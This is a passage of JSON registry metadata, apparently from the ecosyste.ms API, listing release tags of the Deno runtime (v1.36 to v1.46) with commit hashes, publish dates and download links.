repositories/denoland%2Fdeno/tags/v1.46.0/manifests"},{"name":"v1.45.5","sha":"52fd273834c0675f651577e23785d76f67423ab1","kind":"commit","published_at":"2024-07-31T19:11:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.5/manifests"},{"name":"v1.45.4","sha":"c0b1d19d559bfb1fbb65675b3849a9c0396d131f","kind":"commit","published_at":"2024-07-26T16:38:02.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.4/manifests"},{"name":"v1.45.3","sha":"87ce64e57486fc006e82806c9ed8c49f11c2cb73","kind":"commit","published_at":"2024-07-22T21:34:15.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.3/manifests"},{"name":"v1.45.2","sha":"85de4280a1f9fae572a7331db6344cee123ddab7","kind":"commit","published_at":"2024-07-12T20:04:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.2/manifests"},{"name":"v1.45.1","sha":"c841d163e3dc344c06f10579672cc5e2b095933f","kind":"commit","published_at":"2024-07-11T18:46:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.1/manifests"},{"name":"v1.45.0","sha":"04ff5c731d55f2402e7b08e378eaf6e5a5a4d961","kind":"commit","published_at":"2024-07-10T22:08:02.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.0/manifests"},{"name":"v1.44.4","sha":"892e7c20ac6e7bc0601f4c23e64f43187c1b8479","kind":"commit","published_at":"2024-06-19T16:28:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.44.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.44.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.44.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.4/manifests"},{"name":"v1.44.3","sha":"ab2ab0f7fc4e7bda16544ef96a5e6ba114e799b5","kind":"commit","published_at":"2024-06-19T00:19:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.44.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.44.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.44.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.3/manifests"},{"name":"v1.44.2","sha":"9ca1320746072001feab9f6a26e9c1518609bd7b","kind":"commit","published_at":"2024-06-13T00:51:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.44.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.44.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.44.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.2/manifests"},{"name":"v1.44.1","sha":"e02a32be2797f7c107d19da8bf2aff5bbcd97bad","kind":"commit","published_at":"2024-06-05T23:05:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.44.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.44.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.44.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.1/manifests"},{"name":"v1.44.0","sha":"f3ffffc682604349b96dbe4ad33daa5dd1a09f63","kind":"commit","published_at":"2024-05-30T05:58:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.44.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.44.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.44.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.0/manifests"},{"name":"v1.43.6","sha":"7df3d5aeec14f24e5fdec1e1e6f5739f1fbeebbe","kind":"commit","published_at":"2024-05-21T23:34:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.6","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.6/manifests"},{"name":"v1.43.5","sha":"a13c4531fd2c08617767cc8a0788b9e20ac27d45","kind":"commit","published_at":"2024-05-18T00:22:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.5/manifests"},{"name":"v1.43.4","sha":"d64921c1906ee1ac39230c16abe9ff8c546bd645","kind":"commit","published_at":"2024-05-16T23:28:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.4/manifests"},{"name":"v1.43.3","sha":"d6ad253882a6c066e0c673ff64e6554a37bb3487","kind":"commit","published_at":"2024-05-10T20:37:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.3/manifests"},{"name":"v1.43.2","sha":"acd75bbd75fdf46c213d7b21093e09349318da5d","kind":"commit","published_at":"2024-05-08T22:21:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.2/manifests"},{"name":"v1.43.1","sha":"5ff881a0737eccceed55a0ace3ef3110d5b72b2f","kind":"commit","published_at":"2024-05-01T06:46:39.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.1/manifests"},{"name":"v1.43.0","sha":"5ff881a0737eccceed55a0ace3ef3110d5b72b2f","kind":"commit","published_at":"2024-05-01T06:46:39.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.0/manifests"},{"name":"v1.42.4","sha":"7cb23c5e3ee0b6c416f4c0e34c7c63fdf5024138","kind":"commit","published_at":"2024-04-16T00:17:02.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.42.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.42.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.42.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.4/manifests"},{"name":"v1.42.3","sha":"a64a257024c9933d90494613ac6b302cc69df6fa","kind":"commit","published_at":"2024-04-12T00:54:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.42.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.42.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.42.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.3/manifests"},{"name":"v1.42.2","sha":"04c0a4cbf7c00811d3ace3184c1cb8597a0e88f1","kind":"commit","published_at":"2024-04-11T06:39:03.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.42.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.42.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.42.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.2/manifests"},{"name":"v1.42.1","sha":"08f0613b390b289d07c6ea165bed0518809b34e8","kind":"commit","published_at":"2024-04-01T06:33:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.42.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.42.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.42.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.1/manifests"},{"name":"v1.42.0","sha":"9c6eca1064de029e560377bef831e69d22c5c00b","kind":"commit","published_at":"2024-03-28T00:47:33.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.42.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.42.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.42.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.0/manifests"},{"name":"v1.41.3","sha":"0d7662e1556a60bcc4b7075752fb2c2842b1afea","kind":"commit","published_at":"2024-03-14T18:13:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.41.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.41.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.41.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.3/manifests"},{"name":"v1.41.2","sha":"6d062cf0c79158a8c0c8a136c945c3eab2af8b50","kind":"commit","published_at":"2024-03-08T07:32:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.41.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.41.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.41.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.2/manifests"},{"name":"v1.41.1","sha":"8ccb9e954548d1a4d3ccbe065c28d6067d3fda03","kind":"commit","published_at":"2024-03-01T00:25:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.41.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.41.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.41.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.1/manifests"},{"name":"v1.41.0","sha":"118445103b019fbeb50eadc8d09d450fa8c33eee","kind":"commit","published_at":"2024-02-22T01:44:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.41.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.41.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.41.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.0/manifests"},{"name":"v1.40.5","sha":"2c97831fec0d335a474c4a599a5df345a23ef036","kind":"commit","published_at":"2024-02-15T05:22:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.5/manifests"},{"name":"v1.40.4","sha":"49214d309fc373a80a02f57545131b15f7813a98","kind":"commit","published_at":"2024-02-08T11:05:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.4/manifests"},{"name":"v1.40.3","sha":"887fd59486325ad99c183955b35fec07fd45516c","kind":"commit","published_at":"2024-02-01T06:27:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.3/manifests"},{"name":"v1.40.2","sha":"9a55a72cf195b2d5cee1e8598c7d28e4b1e8013a","kind":"commit","published_at":"2024-01-26T16:36:20.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.2/manifests"},{"name":"v1.40.1","sha":"b003ecec64782ebe3aa7e5b17728df2e6a6e2e39","kind":"commit","published_at":"2024-01-25T15:22:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.1/manifests"},{"name":"v1.40.0","sha":"9e575a286269c38c1af0a918a2a4ea4639a3004b","kind":"commit","published_at":"2024-01-25T02:48:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.0/manifests"},{"name":"v1.39.4","sha":"be4d0b7ad306312b0c01e1abc345e54b4e589ab6","kind":"commit","published_at":"2024-01-13T23:52:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.39.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.39.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.39.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.4/manifests"},{"name":"v1.39.3","sha":"aa23ccd1ae3b0c188336c0fd1d84deaed5fe13af","kind":"commit","published_at":"2024-01-12T14:58:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.39.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.39.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.39.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.3/manifests"},{"name":"v1.39.2","sha":"6af25c0592af46781b63bd43cf12d39b8aa61d09","kind":"commit","published_at":"2024-01-04T20:40:03.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.39.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.39.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.39.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.2/manifests"},{"name":"v1.39.1","sha":"68254ddc2060c32e6daa55aa3b33f82739655705","kind":"commit","published_at":"2023-12-21T15:46:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.39.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.39.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.39.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.1/manifests"},{"name":"v1.39.0","sha":"5b96f7bf21392620f0047687ec3b75b25b7ea9f2","kind":"commit","published_at":"2023-12-13T21:52:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.39.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.39.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.39.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.0/manifests"},{"name":"v1.38.5","sha":"172e5f0a0cea97ba27f7f6e46fb8f9b31f8dbbc6","kind":"commit","published_at":"2023-12-05T22:37:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.5/manifests"},{"name":"v1.38.4","sha":"8c07f52a7cbd6117e968383c94fe25b91c4c9242","kind":"commit","published_at":"2023-11-30T19:12:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.4/manifests"},{"name":"v1.38.3","sha":"3193e93912f87dd05871abb61f54297368f3f265","kind":"commit","published_at":"2023-11-24T03:49:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.3/manifests"},{"name":"v1.38.2","sha":"118be11e8c64fd6c4afb352b5095c02fa5571e8e","kind":"commit","published_at":"2023-11-17T05:57:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.2/manifests"},{"name":"v1.38.1","sha":"0e7ad0388be7413db6ded8b60d5ae5d7cc0ffda0","kind":"commit","published_at":"2023-11-10T11:46:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.1/manifests"},{"name":"v1.38.0","sha":"41877a0b3735d52db8b4f5047b1d4d61e37ba585","kind":"commit","published_at":"2023-11-02T01:01:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.0/manifests"},{"name":"v1.37.2","sha":"7282994df4f9c1748affa7c4455eea46a9e1a2e0","kind":"commit","published_at":"2023-10-13T00:14:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.37.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.37.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.37.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.2/manifests"},{"name":"v1.37.1","sha":"72c276d61a8b43abd3dbcf4f1440a2bf133fe0d2","kind":"commit","published_at":"2023-09-27T06:24:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.37.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.37.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.37.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.1/manifests"},{"name":"v1.37.0","sha":"997aa604dfd50c0f0ec6fd4db16b5034d2cfd726","kind":"commit","published_at":"2023-09-19T20:29:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.37.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.37.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.37.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.0/manifests"},{"name":"v1.36.4","sha":"c0617d11f6391f1b1b3afffe0152c73b5989ab80","kind":"commit","published_at":"2023-09-01T14:15:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.36.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.36.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.36.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.